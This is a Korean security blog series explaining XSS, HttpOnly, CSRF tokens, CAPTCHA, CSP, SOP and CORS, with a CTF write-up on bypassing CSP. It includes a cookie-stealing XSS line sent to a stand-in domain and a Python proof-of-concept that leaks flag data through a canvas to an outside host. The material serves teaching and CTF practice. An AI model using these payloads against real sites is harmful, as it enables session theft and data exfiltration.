이해하기 쉬운 웹 보안 모델 이야기 2 (CSP)

 

1. 개요

본 문서는 지난 시리즈인 SOP(Same-Origin Policy)와 CORS(Cross-Origin Resource Sharing)에 이어서 또 다른 웹 보안 모델인 CSP(Content Security Policy)에 대해 서술한 문서입니다. CSP 또한 많은 웹 개발자 분들과 보안 연구원 분들을 귀찮고 힘들게(?) 하는 정책이자, 웹 상에서 취약점으로 인해 정보가 탈취되거나 악의적인 행위가 수행되지 않도록 막아주는 중요한 정책 입니다. 이번 글은 지난 글에 이어진 이야기로 이해를 돕기 위해 “이해하기 쉬운 웹 보안 모델 이야기” 시리즈의 이전 글인 “이해하기 쉬운 웹 보안 모델 이야기 1 (SOP, CORS)”을 먼저 읽고 오시길 권장드립니다.

 

2. 웹 브라우저 보안의 천적, XSS 취약점

웹의 기본적인 보안 정책은 지난 글에서 설명 드렸던 Same-Origin Policy(이하 SOP)에 뿌리를 두고 있습니다. SOP의 웹 보안 모델의 본래의 설계 목적은 JavaScript와 같은 언어가 해당 사이트 개발자가 설계한대로만 실행된다는 것을 전제로 JavaScript 내에서 타 도메인에 접근하지 못하게 하여 웹과 웹 간의 분리가 되는 완벽한 샌드박스를 기대하며 설계하였습니다.

하지만 기대와 현실은 달랐습니다. 웹과 웹 간의 분리가 되는 완벽한 샌드박스와는 달리 현실은 해커가 해당 브라우저 내의 쿠키를 포함한 정보들을 탈취 할 수 있었습니다. 바로 Cross-site scripting(이하 XSS) 취약점 때문 입니다.

XSS 취약점은 웹사이트 관리자가 아닌 사람이 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점입니다. XSS 취약점은 웹 브라우저가 생겨난 1990년대부터 보고 되었고 2000년 1월에 XSS라는 명칭이 붙었다고 알려져 있습니다. 가장 일반적인 보안 취약점으로 알려져 있으며 현재까지도 가장 많이 발견되고 있는 취약점 중 하나 입니다.

웹 개발자의 실수로 외부로부터 입력되는 파라미터에 대한 적절한 검증을 거치지 않고 페이지 내부에 포함하는 기능을 구현하였고, 해커는 이 기능을 악용하여 XSS 취약점으로 파라미터를 통해 정보를 탈취하는 악성 스크립트를 삽입하였습니다. 이렇게 삽입된 스크립트는 피해자의 브라우저에서 실행되어 사용자 브라우저의 정보를 탈취할 수 있었습니다.

예를 들어, 공격자가 location.href='http://example.com?'+document.cookie와 같은 스크립트를 삽입하게 되면 삽입한 스크립트는 피해자의 브라우저에서 실행되고, 사용자의 세션 ID가 포함된 쿠키 값이 공격자가 설정한 도메인으로 전송 되어 공격자는 서버로 전송된 값을 탈취할 수 있게 됩니다. 이후 공격자는 탈취한 세션 ID를 통해 해당 페이지에 접속하여 사용자의 계정을 탈취할 수 있습니다. 만약, 사건의 발단인 웹 개발자의 실수가 없었다면 SOP 정책의 설계상 정보가 탈취되는 일은 발생하지 않았을 것 입니다.

 

3. Set-Cookie HttpOnly

이제부터는 XSS 취약점에 의해 사용자의 정보가 위험한 상태에서 이를 보완할 수 있는 보안 정책을 알아보겠습니다. 먼저 알아볼 Set-Cookie 응답 헤더는 서버에서 사용자 브라우저에 쿠키를 전송하기 위해 사용됩니다. 이 Set-Cookie 헤더에는 XSS 취약점을 이용한 공격을 방해하기 위한 HttpOnly 속성이 존재합니다. HttpOnly 속성은 JavaScript에서의 document.cookie에 대한 접근을 차단하는 정책으로 XSS 취약점을 완화하기 위한 목적으로 설계되었으며 2008년 Firefox 3.0에 최초로 적용되었습니다.

일반적으로 공격자들이 XSS 취약점을 활용하여 많이 노리는 것은 세션 ID가 포함된 쿠키 값 입니다. 왜냐하면 공격자가 세션 ID가 포함된 쿠키 값만 획득하게 되면 해당 사용자 계정을 탈취할 수 있고 그 후 탈취한 계정을 가지고 악의적인 행위를 할 수 있기 때문입니다. HttpOnly 속성은 공격자들이 가장 많이 노리는 세션 ID가 포함된 쿠키 값에 대해 JavaScript에서 접근을 차단함으로써 근본적으로 XSS 취약점을 활용한 계정 탈취가 불가능하도록 하는 정책입니다.

Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly

위와 같이 서버에서 전송되는 HTTP 응답 패킷의 Set-Cookie 헤더에 HttpOnly 속성을 적용할 수 있습니다. XSS 취약점이 발생하더라도 공격자들이 최종 목표로 세션 ID를 타겟으로 노리는 것을 역으로 활용하여 HttpOnly 속성을 사용하여 쿠키 값에 대한 접근을 차단함으로써 공격자로부터 사용자를 안전하게 보호할 수 있습니다.

하지만, 단순하게 세션 ID가 포함된 쿠키 값에 대한 접근을 차단한다고 모든 문제가 해결되지는 않습니다. XSS 취약점은 상황에 따라 Cross-site request forgery(이하 CSRF) 취약점으로 발전할 수 있는 가능성이 열려 있기 때문입니다. CSRF 취약점이 발생하게 되면 사용자 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 수행하게 됩니다. 예를 들어 회원 정보 수정 요청을 강제로 전송하여 비밀번호를 공격자가 원하는 비밀번호로 변경하거나, 자신의 포인트를 공격자에게 선물하는 등의 본래 사이트에 존재하는 기능을 활용한 다양한 행위가 가능합니다.

 

4. CSRF Token & CAPTCHA

사용자가 회원 정보 수정 등 중요한 행위를 수행하는 페이지에서는 임의 랜덤 값인 CSRF token을 이용하여 CSRF 취약점에 대응할 수 있습니다. CSRF token을 활용하는 방법은 실제 사용자의 사용성에 영향을 주지 않는다는 장점을 가지고 있지만 다소 간단하게 우회될 수 있는 단점을 가지고 있습니다. CSRF token을 활용하는 방법은 회원 정보 수정 페이지 등에서 보이지 않는 input을 만들어 랜덤한 문자열을 CSRF token으로 출력합니다. 이후, 수정 기능을 처리하는 페이지에서 이전 페이지에 출력한 CSRF token과 전송된 CSRF token 값을 비교하여 해당 요청이 이전 페이지에서 전송되었는지 확인할 수 있습니다. 하지만 이 방법 또한 요청 전 페이지의 응답 값을 가져와서 CSRF token 추출 후 데이터 전송 시 CSRF token 값을 함께 전송하면 우회할 수 있으므로 CSRF 취약점에 대한 완전한 방어는 불가능 합니다.

[Google CAPTCHA 예제 이미지]

이러한 문제를 해결하기 위해 실제 사람인지 컴퓨터 프로그램을 통해 전송되는 요청인지 확인하는 기술인 Completely Automated Public Turing test to tell Computers and Humans Apart(CAPTCHA)를 이용하여 대부분의 CSRF 취약점을 차단할 수 있습니다. CAPTCHA는 행위, 오디오, 이미지 등을 통해 기계와 사람을 구별할 수 있도록 하는 기술입니다. 회원 정보 수정 페이지에 CAPTCHA를 삽입하여 사람으로 판단될 경우에만 정상적으로 회원 정보 수정 기능을 수행하도록 하는 것입니다. 이 방법은 사람임을 증명하기 위해 드래그와 같은 특정 행위를 하거나, 이미지를 인식하여 클릭하는 등 다소 사용성에 불편을 줄 수 있는 방법이지만 프로그래밍을 통해 우회하기 매우 힘들기 때문에 보안성 측면은 상당 부분 향상 시킬 수 있는 방법입니다.

 

5. Content Security Policy(CSP)

지금까지 XSS 취약점으로부터 웹 브라우저를 안전하게 보호하기 위한 다양한 방어 방법들을 알아보았습니다. CAPTCHA를 이용하여 회원 정보 수정 등 중요한 페이지에서 CSRF 취약점을 활용하여 공격자가 의도한 행위를 수행하지 못하도록 방어 할 수 있습니다. 하지만 여전히 공격자가 XSS 취약점을 통해 사용자의 브라우저에서 JavaScript를 실행할 수 있다는 점은 변하지 않았습니다.

XSS 취약점을 이용하여 JavaScript를 실행할 수 있으므로 취약점 발생시 구매 내역이라던가 회원 정보 수정 페이지 등 단순 정보 출력 페이지에 요청하여 개인정보를 탈취할 수 있는 가능성은 여전히 남아있습니다. XSS 취약점을 이용한 공격 가능성이 계속하여 잔존함에 따라 XSS 취약점을 이용한 공격이 다수 발생하게 되었고 2007년 일부 연구자들은 웹 사이트의 68%가 XSS 공격에 노출 될 가능성이 있다고 밝혔으며, XSS 취약점에 대한 방어법이 절실히 필요하게 되었습니다. 따라서 그에 대한 방어법 연구가 계속 진행되었으며 XSS 취약점의 대응방안인 Content Security Policy(이하 CSP)가 2011년 Firefox 4.0에 처음 등장하게 됩니다.

CSP는 XSS, 클릭재킹, 코드 인젝션 등의 공격을 예방하기 위해 도입된 정책으로써 브라우저에서 로드되는 모든 컨텐츠에 제약을 두어 통제하는 보안 정책입니다. 원래 이름은 Content Restrictions이었으며 2004년 Robert Hansen에 의해 처음 제안되었다고 알려져 있습니다. CSP는 공격자가 웹 내부에서 자바스크립트를 실행할 수 있더라도 특정 도메인의 리소스만 참조할 수 있게 하거나, 리소스를 아예 참조 못하게 하는 등의 리소스에 대한 보안 정책을 설정하여 허가되지 않은 스크립트 로드 자체를 방지하는 보안 정책 입니다.

Content-Security-Policy: default-src 'self'

CSP는 응답 헤더와 meta 태그를 통해 설정 가능하며, 위와 같이 설정할 경우 모든 컨텐츠에 대하여 현재 사이트의 도메인 범위 내에서만 로드가 가능합니다. 예를 들어 script 태그의 src 옵션을 사용할 경우 cdn 사이트 도메인을 사용하게 되면 CSP 정책에 의하여 차단됩니다.

Content-Security-Policy: default-src 'self' trusted.com *.trusted.com

따라서 기본적으로 현재 사이트의 도메인 범위 내에서만 로드를 허용하고 cdn과 같이 도메인을 특정할 수 있는 경우엔 위와 같이 특정 도메인만 허용하도록 설정할 수 있습니다.

Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com

그 외에도 img-src, media-src와 같이 여러 태그 종류별로 보안 설정을 다르게 하도록 설정할 수 있습니다. 위와 같이 설정하게 되면 특정하지 않은 태그의 src의 경우에는 현재 사이트의 도메인 범위 내만 허용하도록 하고 img는 모두 허용, media는 media1.com, media2.com에서만 허용, script는 userscripts.example.com 도메인만 허용하도록 설정됩니다. 기타 항목에 따른 자세한 설정 방법은 https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy에서 확인할 수 있습니다.

 

6. CSP bypass

최근 CONFidence 2020 CTF Finals에서 Yet Another Yet Another Cat Challenge 문제명으로 CSP를 우회하는 문제가 출제된 적이 있습니다.

Content-Security-Policy: default-src 'none'; form-action 'self'; frame-ancestors 'none'; style-src https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css; img-src 'self'; script-src 'nonce-cyotMpPGPBs7xFYiedGn3Q' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; frame-src https://www.google.com/recaptcha/

문제에서는 위와 같이 Content-Security-Policy에 대부분의 제약을 설정해두었고 허용된 설정이 많지 않았습니다. form-action, img-src만 self로 현재 사이트의 도메인 범위 내만 허용하도록 설정 되어 있습니다.

theme 파라미터를 통해 블랙, 화이트 테마를 바꿀 수 있도록 기능을 지원하였는데 이 부분에서 DOM XSS가 발생하였습니다. 또한 운영자 쿠키를 가지고 /flag?var=flag 경로에 접근할 경우 flag가 출력됩니다. /flag에서는 var 파라미터를 통해 응답 값의 prefix를 설정할 수 있었습니다. 결론적으로 XSS가 가능하고 img-src가 self인 점을 이용하여 /flag?var=에 prefix로 bmp header를 삽입하여 이미지로 둔갑(?)하여 로드한 다음, 해당 이미지를 canvas로 읽어서 데이터를 추출해내었습니다.

import urllib.parse
import requests

data = open('1.bmp', 'rb').read()[:0x30]
print(urllib.parse.quote(data))

url = "http://yayacc.zajebistyc.tf/note"

data = {
    "cat_url": "/flag?var="+urllib.parse.quote(data),
    "content": "<marquee>Yee</marquee>",
}

res = requests.post(url, data=data, allow_redirects=False)

u = res.text[res.text.find("<a href")+9:res.text.find("\">/note/")]
uuid = u[u.rfind('/')+1:]

data = {
    "cat_url": '''/*</script>
    <META HTTP-EQUIV="refresh" CONTENT="0;url=//yayacc.zajebistyc.tf/note/'''+ uuid +'''?theme=1;img.onload = function(){var canvas=document.createElement(`canvas`);var ctx=canvas.getContext(`2d`);ctx.drawImage(img,0,0);location.href=`http://zairo.kr:1234/?`+escape(String.fromCharCode.apply(null, ctx.getImageData(0,0,img.width,img.height).data.slice(0,20)));}">
    //
    ''',
    "content": "<marquee>Yee</marquee>",
}

res = requests.post(url, data=data, allow_redirects=False)

u = res.text[res.text.find("<a href")+9:res.text.find("\">/note/")]
print("http://yayacc.zajebistyc.tf" + u)

1.bmp

Content-Security-Policy 설정 시 직접적인 발단이 될 수 있는 script-src에만 nonce, URL을 통한 제약을 설정하고 img-src에 대한 설정은 'self' 또는 *로 설정하는 것이 일반적인데, 만약 XSS 취약점이 발생한다면 이미지를 통해서도 데이터를 유출할 수 있음을 알려주고자 하는 것이 출제자의 의도로 풀이 됩니다.

위는 제가 대회 당시 해당 문제를 풀었던 PoC(Proof of Concept) 코드 입니다. 현재는 해당 문제에 대한 코드 및 정보가 남아 있지 않아 자세히 설명드리지 못하는 점 양해 부탁드립니다. 이 외에도 CSP 제약 안에서 다양한 기법(CSS injection, Cache poisoning, CDN callback, Side-channel attack등)을 이용한 CSP 우회 방법 등이 계속하여 등장하고 있으므로 우회가 가능한 케이스를 지속적으로 습득하여 우회가 가능한 환경을 만들지 않도록 하는 것이 중요할 것으로 사료됩니다.

 

7. 마치며

이번 시리즈에서는 XSS 취약점에서 부터 시작한 여러가지 보안 정책에 대해서 알아보았습니다. 다수의 정책이 서로 다른 커버리지를 보완하는 것을 보면서 공격자가 하나의 정책을 우회하더라도 다른 정책에서 차단될 수 있도록 전체적인 단계별로 Layered Security 개념을 적용하는 것이 중요하다는 것을 이번 사례를 통해 알아보았습니다.

 

8. 참고자료

https://developers.google.com/web/fundamentals/security/csp?hl=ko

https://developer.mozilla.org/ko/docs/Web/HTTP/Headers/Content-Security-Policy

https://ko.wikipedia.org/wiki/콘텐츠_보안_정책

https://en.wikipedia.org/wiki/Content_Security_Policy

https://blog.mozilla.org/security/2013/06/11/content-security-policy-1-0-lands-in-firefox/

https://developer.mozilla.org/ko/docs/Web/HTTP/Headers/Set-Cookie

https://ko.wikipedia.org/wiki/사이트요청_위조

https://ko.wikipedia.org/wiki/CAPTCHA

https://ko.wikipedia.org/wiki/사이트스크립팅

https://en.wikipedia.org/wiki/Cross-site_scripting

https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

이해하기 쉬운 웹 보안 모델 이야기 1 (SOP, CORS)

 

1. 개요

본 문서는 웹 보안 모델인 SOP(Same-Origin Policy)와 CORS(Cross-Origin Resource Sharing)에 대해 서술한 문서입니다. 많은 웹 개발자 분들과 보안 연구원 분들을 귀찮고 힘들게(?) 하는 정책이자, 웹 상에서 취약점으로 인해 정보가 탈취되거나 악의적인 행위가 수행되지 않도록 막아주는 중요한 정책 입니다. 많은 분들께 도움이 되었으면 하는 마음에 최대한 쉽게 이해하실 수 있도록 정리하였습니다.

 

2. 웹 브라우저의 역사

우리가 일상생활에서 웹을 사용할 때, 일반적으로 웹 브라우저라는 프로그램을 사용하여 다양한 웹 서버를 서핑하게 됩니다. 우리가 일상에서 당연하듯이 쓰는 웹 브라우저는 이 글을 쓰는 시점으로부터 약 30년 정도의 역사를 가지고 있습니다. 지금으로부터 대략 30년전으로 거슬러 올라간 1990년에 팀 버너스 리가 HTML와 웹 서버, 웹 브라우저를 최초로 발명하였다고 알려져 있습니다.

1990년대, 웹 브라우저가 처음 만들어지던 초기에는 단순하게 정적인 HTML만을 렌더링하여 사용하였습니다. Netscape 기업의 설립자 마크 로웰 앤드리슨이 웹 브라우저 내에서 이미지, 플러그인 등의 요소를 쉽게 조합할 수 있는 글루 언어(glue language)가 필요하다고 생각하였고 1995년 JavaScript가 도입된 Netscape Navigator 2.0가 출시되었습니다. 브라우저에 JavaScript가 도입된 이후, Netscape Navigator 2.02 버전에서 Same-Origin Policy(이하 SOP)가 등장하였습니다.

[웹 브라우저 Netscape Navigator 2.0.2]

(https://upload.wikimedia.org/wikipedia/commons/thumb/6/69/Netscape_Navigator_2_Screenshot.png/220px-Netscape_Navigator_2_Screenshot.png)

 

3. DOM(Document Object Model)

웹 브라우저에 JavaScript가 도입된 이후 SOP가 추가된 것을 보면 둘 간의 밀접한 연관이 있을 것이라고 예측 할 수 있습니다. 여기에서 웹 브라우저에서 JavaScript를 이용하여 무엇이 가능하게 되었길래 그 직후에 SOP가 추가 되었을지 의문을 가져볼 수 있습니다.

웹 브라우저에서 JavaScript를 도입한 이유는 웹 브라우저 내에서 이미지, 플러그인 등의 요소를 쉽게 접근하고 조합할 수 있도록 하기 위해서 입니다. 따라서 JavaScript를 이용하여 브라우저 내부의 문서 객체인 Document Object Model(이하 DOM)에 접근할 수 있도록 개발되었습니다. DOM이란 HTML 문서의 객체 기반 표현 방식 입니다. 쉽게 설명드리면 JavaScript를 통해 HTML로 표현된 객체에 접근하여 변경, 제거 등의 작업을 수행할 수 있도록 해주는 것이 DOM 입니다.

예를 들어 JavaScript에서 아래와 같이 form 내부의 input 태그 value 속성 값을 가져오려고 할 때, document.test_form.test_input.value 와 같이 접근하는 것이 DOM을 이용한 것이라고 할 수 있습니다.

<html>
    <head>
        <title>test</title>
    </head>
    <body>
        <form name="test_form">
            <input name="test_input" value="test_value">
        </form>
        <script>
            alert(document.test_form.test_input.value);
        </script>
    </body>
</html>

[DOM 예시]

[DOM 예시 실행화면]

 

4. AJAX(Asynchronous JavaScript and XML)

지금까지 웹 브라우저 역사와 DOM 까지 알아봤습니다. 이제 브라우저에 JavaScript가 등장한 이후 생겨나게 된 기술인 Asynchronous JavaScript and XML(이하 AJAX)에 대해서 알아보도록 하겠습니다.

페이지가 로드 된 이후 페이지에서 JavaScript를 이용하여 비동기식으로 서버와 상호작용하는 것을 AJAX라고 합니다. AJAX는 페이지 전체를 로딩하지 않고도 비동기식으로 필요한 부분만 동적으로 처리하거나 로딩할 수 있는 장점 때문에 웹 개발자들에게 많은 사랑을 받고 있습니다.

AJAX를 사용한 간단한 예시를 통해 AJAX에 대해 알려드리겠습니다. 아래 예시는 AJAX를 이용하여 test.html의 값을 불러와 로드하는 예제입니다.

<h1>It's works!</h1>

[test.html]

<html>
    <head>
        <title>test</title>
    </head>
    <body>
        <div id="result">
        </div>
        <script>
            httpRequest = new XMLHttpRequest();
            httpRequest.onreadystatechange = function() {
                if(this.status == 200 && this.readyState == this.DONE) {
                    document.getElementById("result").innerHTML = httpRequest.responseText;
                }
            };
            httpRequest.open('GET', '/test.html');
            httpRequest.send();
        </script>
    </body>
</html>

[index.html]

[index.html 실행 화면]

XMLHttpRequest 객체를 이용하여 JavaScript에서 비동기식으로 이미 로드된 페이지가 아닌 다른 페이지의 응답 값을 동적으로 로드할 수 있는 것을 확인하였습니다.

아마도 여기까지 이해하셨다면 개발시 service.example.comapi.example.com 같이 프론트엔드와 백엔드 기능을 수행하는 API 서버를 별도로 분리 구축해두고 프론트엔드에서 해당 API를 호출해서 사용하면 편리할 것이라고 생각하실 겁니다.

하지만, 이런 상황에서 AJAX를 이용하여 현재 접속한 페이지의 service.example.com도메인이 아닌 api.example.com와 같은 타 도메인 리소스에 요청하여 응답 값을 가져올 경우, SOP와 CORS 정책에 따라 아래의 에러와 직면하게 될 것입니다.

(index):1 Access to XMLHttpRequest at 'http://api.example.com/' from origin 'http://service.example.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

실제 개발자분들이 큰 규모의 개발 프로젝트에 투입되어 파트를 나눠 개발하다보면 각각 다른 팀에서 여러 서버를 분담하여 개발하게 되면서 추후 기능을 합칠 때 이 SOP, CORS 에러를 매우 빈번하게 겪게 됩니다. 아마 해당 문제에 직면해서 문제를 해결하기 위해 이 글을 읽고 계시는 분들도 있으실거라 생각됩니다.

 

5. SOP(Same-Origin Policy)

그럼 이제부터 본격적으로 SOP와 CORS가 무엇인지 알아보도록 하겠습니다. SOP란 직역하자면 동일 출처 정책이란 뜻으로 동일한 출처의 리소스만 상호작용을 허용하는 정책입니다. 역으로 설명드리면 A 출처에서 온 문서가 B 출처에서 가져온 리소스와 상호작용하는 것을 차단하는 보안 정책입니다. 두 URL의 프로토콜, 호스트, 포트가 모두 같아야 동일한 출처로 인정되며 웹 사이트를 샌드박스화 하여 잠재적인 보안 위협으로부터 보호해주는 정책 입니다.

개발시 해당 문제를 자주 겪다 보면 귀찮음도 생기고 왜 다른 출처간의 상호작용을 차단하는 건지 의문점을 가질 수 있습니다. 만약 다른 출처간의 상호작용을 차단하지 않는다면 어떤 일이 발생할 수 있는지 확인해보겠습니다.

SOP가 없는 상황에서 악의적인 JavaScript가 포함되어있는 페이지에 접속하는 상황을 가정하여 설명드리겠습니다. 사용자가 악성페이지에 접속하여 악의적인 JavaScript가 실행되면 사용자가 모르는 사이에 포털사이트인 potal.example.com에 임의의 요청을 보내고 그 응답 값을 해커의 서버로 재차 보내 사용자의 소중한 개인정보가 탈취되는 것입니다. 더 나아가서는 JavaScript를 이용하여 사용자가 접속중인 내부망의 아이피와 포트를 스캐닝 하거나, 해커가 사용자 브라우저를 프록시처럼 사용할 수도 있을 것 입니다.

위의 몇 가지 사례를 통해 SOP가 존재하는 이유에 대해서 간접적으로 알아보았습니다. 따라서 이런 경우가 발생할 가능성을 사전에 방지하기 위해 SOP가 존재한다고 할 수 있습니다.

 

6. CORS(Cross-Origin Resource Sharing)

보안도 중요하지만 개발을 하다 보면 개발 시 기능상 어쩔 수 없이 다른 출처간의 상호작용을 해야 하는 케이스가 존재합니다. 이런 경우를 대비 하기 위해 SOP의 예외 정책으로 Cross-Origin Resource Sharing(이하 CORS)라는 정책을 마련해두었습니다. 따라서 CORS을 이용하면 SOP의 제약을 받지 않게 됩니다.

먼저 CORS가 어떤 방식으로 동작하는지 확인해보겠습니다. service.example.com 사이트에서는 api.example.com 사이트의 리소스를 가져오기 위해 아래와 같은 JavaScript를 구성하였습니다.

<html>
    <head>
        <title>test</title>
    </head>
    <body>
        <div id="result">
        </div>
        <script>
            httpRequest = new XMLHttpRequest();
            httpRequest.onreadystatechange = function() {
                if(this.status == 200 && this.readyState == this.DONE) {
                    document.getElementById("result").innerHTML = httpRequest.responseText;
                }
            };
            httpRequest.open('GET', 'http://api.example.com/api/v1/test');
            httpRequest.send();
        </script>
    </body>
</html>

위와 같이 service.example.com 사이트에서 api.example.com사이트의 리소스를 요청할 경우에 전송되는 HTTP 패킷에서는 service.example.com 사이트의 프로토콜, 호스트, 포트 정보가 Origin 헤더를 통해 전송됩니다.

GET /api/v1/test HTTP/1.1
Host: api.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://service.example.com

서버는 요청된 Origin 헤더를 보고 어느 사이트를 통해 요청이 전송됐는지 확인할 수 있습니다. 해당 요청에 대한 응답 값은 아래와 같이 전송할 경우, 정상적으로 api.example.com사이트에서 데이터를 불러와 로드할 수 있습니다.

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 00:23:53 GMT
Server: Apache/2
Access-Control-Allow-Origin: *
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/xml

[…Data…]

서버는 Access-Control-Allow-Origin 헤더를 통해 응답하여야 합니다. 위 응답 패킷에서의 Access-Control-Allow-Origin: * 은 모든 도메인에서 접근을 허용한다는 의미로 만약, 특정 도메인만 허용하고 싶다면 Access-Control-Allow-Origin: https://service.example.com로 응답하면 https://service.example.com의 요청에 대해서만 리소스에 대한 접근을 허용합니다. 이해하기 쉽게 표현하면 서버에 Access-Control-Allow-Origin헤더를 통해 퍼가기 가능 대상 목록을 미리 선언해둔다고 생각하면 될 것 같습니다.

(index):1 Access to XMLHttpRequest at 'http://api.example.com/' from origin 'http://service.example.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

따라서 위의 에러와 직면한 분들은 응답을 불러오려고 하는 서버의 응답 헤더에 Access-Control-Allow-Origin헤더를 추가하여 문제를 해결하실 수 있습니다.

 

7. Same-Origin Policy를 우회하려다가 발생할 수 있는 취약점

SOP는 동일한 출처가 아닌 다른 도메인의 리소스를 차단하는 정책이므로 간혹 개발 기능에 따라 다른 도메인의 리소스와 상호작용을 해야할 경우가 있습니다. 위에서 알아본 SOP와 CORS 정책에 따라서 정상적으로 로드하기 위해서는 리소스를 가져올 서버에 직접 접근하여 서버측 소스코드에 응답 시 Access-Control-Allow-Origin 헤더를 추가하도록 해야 하는 단점이 있습니다.

하지만, 업무상 타 팀에서 개발하거나 운영하고 있는 서버라면 타 팀에 협조를 구해야 하고 해당 서버에 권한이 없는 경우, 프로젝트 마감이 임박한 경우 등에는 현실적으로 CORS를 적용하기 어려운 상황이 됩니다.

이런 경우 마감 기한에 쫓기는 불쌍한(?) 개발자 분들은 어쩔 수 없이 개발 기능 상 타 도메인에서 응답을 받아오기 위해 서버에서 curl이나 HttpURLConnection, urllib, requests 등의 HTTP 모듈을 사용하여 서버에서 직접 응답 값을 가져오도록 구현하게 됩니다. 구현할 때 파라미터에 대한 적절한 검증을 거치지 않는다면 Command Injection 또는 SSRF(Server-side Request Forgery) 취약점이 발생하게 됩니다. 특히 SSRF(Server-side Request Forgery) 취약점이 발생할 가능성이 매우 높습니다.

SSRF(Server-side Request Forgery) 취약점은 공격자가 서버측에서 요청하는 도메인을 변조하여 공격자가 원하는 서버로 요청을 하도록 하여 잘못된 응답 값을 가져가도록 하거나, 요청을 변경 또는 내부망 스캐닝 등을 수행할 수 있습니다.

따라서 여건이 된다면 SOP와 CORS 정책을 최대한 사용하는 것이 좋고 어쩔 수 없이 서버를 통해 요청을 하고 응답 값을 가져와 수행하는 기능 개발시에는 파라미터 검증에 더 주의를 기울여야 할 것으로 생각됩니다.

 

8. 마치며

많은 웹 개발자 분들과 보안 연구원 분들이 SOP(Same-Origin Policy)와 CORS(Cross-Origin Resource Sharing)에 대해 이해하고 보다 안전한 서비스를 만드는 것에 제 글이 조금이나마 도움이 되었으면 좋겠습니다. 다음시간에는 Content Security Policy, 일명 CSP라고 불리는 정책에 대해 알아보겠습니다. 긴 글 읽어주셔서 감사합니다.

 

9. 참고자료

https://en.wikipedia.org/wiki/Same-origin_policy

https://developers.google.com/web/fundamentals/security/csp?hl=ko

https://ko.wikipedia.org/wiki/자바스크립트

https://ko.wikipedia.org/wiki/웹_브라우저

https://ko.wikipedia.org/wiki/HTML

https://ko.wikipedia.org/wiki/마크_앤드리슨

https://en.wikipedia.org/wiki/Same-origin_policy

https://blog.lgcns.com/1165

https://wit.nts-corp.com/2019/02/14/5522

https://velog.io/@yejinh/CORS-4tk536f0db

https://developer.mozilla.org/ko/docs/Web/HTTP/CORS

https://developer.mozilla.org/ko/docs/Web/Guide/AJAX/Getting_Started

https://developer.mozilla.org/ko/docs/Web/Security/Same-origin_policy

https://evan-moon.github.io/2020/05/21/about-cors/

이름 : 박의성

닉네임 : zairo

이메일 : park.uiseong@gmail.com

홈페이지 : http://zairo.kr

소속

- 토스페이먼츠 Security Engineer (2021.09 ~)
- 차세대 보안리더 양성 프로그램(Best of the Best) 멘토 (2020.07 ~)
- 해킹&보안팀 Seoul Electric Decomposer(SED) (2019.08 ~)
- 라온시큐어 라온화이트햇 핵심연구팀 (2017.04 ~ 2021.08)
- 대한민국 공군 침해사고대응팀(CERT) (2014.04 ~ 2016.02)

활동이력

- 2021. 05. DEF CON CTF Qualifier 2021, 7th (Team. StarBugs)
- 2021. 04. PlaidCTF 2021, 5th (Team. StarBugs)
- 2020. 12. DefCamp CTF 2020 Online, 3th (Team. NOAR)
- 2020. 10. SECCON CTF 2020, 1st (Team. HangulSarang)
- 2020. 08. Hackers Playground 2020, 3th (Team. ONE)
- 2020. 08. DEF CON CTF Finals 2020, 11th (Team. Star-Bugs)
- 2020. 06. Defenit CTF, 3rd (Team. NOAR)
- 2020. 05. DEF CON CTF Qualifier 2020, 11th (Team. CandySweetGuys)
- 2019. 12. Christmas CTF, 3rd (Team. 원요한여친구함)
- 2019. 12. IoT 보안위협 시나리오 공모전, 대상 (과학기술정보통신부 장관상) (Team. NOAR)
- 2019. 12. 제2회 온라인 개인정보보호 정책 아이디어 공모전, 우수상 (한국인터넷진흥원장상) (Team. NOAR)
- 2019. 12. 사이버보안 빅데이터 챌린지, 웹서버 공격패턴 분석 부문, 장려상 (Team. NOAR)
- 2019. 11. DefCamp CTF Finals(Bucharest, Romania), 6th (Team. NOAR)
- 2019. 10. Energy x Security Hackathon, SW개발 부문, 대상 (과학기술정보통신부 장관상) (Team. NOAR)
- 2019. 10. 사이버공격방어대회(Cyber Conflict Exercise & Contest) - Defense, 4th (Team. Re:오타쿠모임)
- 2019. 07. 경기도 정보보안 해커톤 대회, 최우수상 (Team. NOAR)
- 2019. 06. KO-WORLD 해킹방어대회, 장려상 (API 호출 순서 및 관계 기반의 지도학습을 적용한 악성코드 판별 모델)
- 2018. 12. 개인정보 비식별 기술 경진대회, 장려상 (Team. BOB주세요)
- 2018. 10. 사이버공격방어대회(Cyber Conflict Exercise & Contest) - Defense(Organization), 1st (Team. EX)
- 2018. 08. Samsung CTF, Finalist (zairo)
- 2018. 03. 육군 해킹방어대회, 최우수상 (육군 참모총장상)
- 2017. 11. WITHCON CTF, Finalist, 8th (Team. RebForPwn)
- 2017. 08. Samsung CTF, Finalist (zairo)
- 2017. 05. HUST Hacking Festival, 4th (Team. RebForPwn)
- 2017. 03. 차세대 보안리더 양성 프로그램(Best of the Best) 5기, Best 10 (미래창조과학부 장관상)
- 2017. 03. LG전자 보안 취약점 탐지, 특별상 (LG전자 부사장상)
- 2016. 12. LG전자 보안 취약점 탐지, 감사상 (LG전자 부사장상)
- 2016. 10. WITHCON CTF, 11th (Team. RebForPwn)
- 2015. 12. Christmas CTF, 9th (Team. Zashys)

강의/발표

- 서울여자대학교 정보보호 영재교육원 - SW 취약점 이해 및 실습환경기반 화이트해커 실습 (2018.04 ~ )
